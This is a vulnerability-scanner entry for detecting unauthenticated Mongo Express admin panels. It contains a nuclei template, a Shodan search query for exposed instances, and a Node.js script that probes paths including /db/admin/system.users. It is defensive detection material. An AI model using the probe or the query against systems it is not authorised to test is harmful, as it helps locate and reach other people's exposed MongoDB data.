unauthenticated-mongo-express: Mongo Express - Unauthenticated Access

Date: 2025-08-01 | Affected software: Mongo Express | PoC: public

Vulnerability description

The Mongo Express web UI is reachable with no authentication in place: an unauthenticated GET to the application root (or the /mongo-express/ path) returns the "Home - Mongo Express" page with HTTP 200 instead of a credential challenge, and collection views such as /db/admin/system.users are served the same way. Since Mongo Express is an administrative front end for the backing MongoDB instance, an exposed instance hands out that database access to anyone who can reach the port, hence the high severity.

PoC code [public]

id: unauthenticated-mongo-express

info:
  name: Mongo Express - Unauthenticated Access
  author: dhiyaneshDK,b0rn2r00t
  severity: high
  description: Mongo Express was able to be access with no authentication requirements in place.
  reference:
    - https://www.exploit-db.com/ghdb/5684
  classification:
    cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: mongo-express_project
    product: mongo-express
    shodan-query: title:"Home - Mongo Express"
  tags: mongo,unauth,edb,misconfig,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}'
      - '{{BaseURL}}/mongo-express/'
      - '{{BaseURL}}/db/admin/system.users'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<title>Home - Mongo Express</title>'
          - '<title>system.users - Mongo Express</title>'
        condition: or

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f15640d2da262480d2d8e325c9b2791e2b3fde38663bf3e702bb12be475884cb0221009e10ac2f9e8b86d59c682d089058fec2b05522d051db93b432d4dfba04febda4:922c64590222798bb761d5b6d8e72950
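For reference, here is the same check re-implemented in Node.js. This is an added example and is not part of the nuclei-templates project or of mongo-express itself: it requests the three paths the template lists, applies the template's matcher semantics (`matchers-condition: and` between the status matcher and the `word` matcher, `condition: or` inside the word list), and runs that logic over constructed sample responses to show why a basic-auth-protected instance answering HTTP 401 is not flagged while an exposed home page or system.users listing is. `probe()` assumes Node 18 or newer for the global `fetch`; the sample responses are constructed, not captured from any host.

```javascript
// Added example (not from nuclei-templates or mongo-express): the template's
// three requests and its matcher logic, re-implemented for Node.js 18+ (global fetch).

// The three paths the template requests, relative to {{BaseURL}}.
const PATHS = ['', '/mongo-express/', '/db/admin/system.users'];

// The template's `word` matcher list; `condition: or` means any one suffices.
// nuclei word matchers are case-sensitive unless `case-insensitive: true` is set.
const TITLE_WORDS = [
  '<title>Home - Mongo Express</title>',
  '<title>system.users - Mongo Express</title>',
];

// `matchers-condition: and`: a response counts only if the word matcher AND the
// status matcher both pass. A basic-auth challenge (401) therefore never matches,
// even if its error page happened to contain one of the title strings.
function matchesTemplate(status, body) {
  const wordHit = TITLE_WORDS.some((w) => body.includes(w));
  return status === 200 && wordHit;
}

// Request each path like the template does (no redirect following, which is
// nuclei's default) and return the URLs whose response matched.
async function probe(baseUrl) {
  const base = baseUrl.replace(/\/+$/, '');
  const hits = [];
  for (const p of PATHS) {
    const url = base + p;
    try {
      const res = await fetch(url, { redirect: 'manual' });
      const body = await res.text();
      if (matchesTemplate(res.status, body)) hits.push(url);
    } catch (err) {
      console.error(`${url}: ${err.message}`); // unreachable host: no match
    }
  }
  return hits;
}

// Constructed sample responses (not captured from any real host).
const SAMPLES = {
  exposedHome: { status: 200, body: '<html><head><title>Home - Mongo Express</title></head></html>' },
  exposedUsers: { status: 200, body: '<html><head><title>system.users - Mongo Express</title></head></html>' },
  protectedInstance: { status: 401, body: 'Unauthorized' }, // basic auth enabled
  otherApp: { status: 200, body: '<html><head><title>Home - Some Other App</title></head></html>' },
};

// Run the matcher over the samples; returns { sampleName: true|false }.
function evaluateSamples(samples = SAMPLES) {
  return Object.fromEntries(
    Object.entries(samples).map(([name, r]) => [name, matchesTemplate(r.status, r.body)]),
  );
}

// Usage: node check.js http://target:8081   (with no argument: prints the sample results)
if (process.argv[2]) {
  probe(process.argv[2]).then((hits) =>
    console.log(hits.length ? `EXPOSED: ${hits.join(', ')}` : 'no match'));
} else {
  console.log(evaluateSamples());
}
```

Only `matchesTemplate` carries the decision logic; `probe` is just the transport, so the part worth unit-testing runs without network access.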
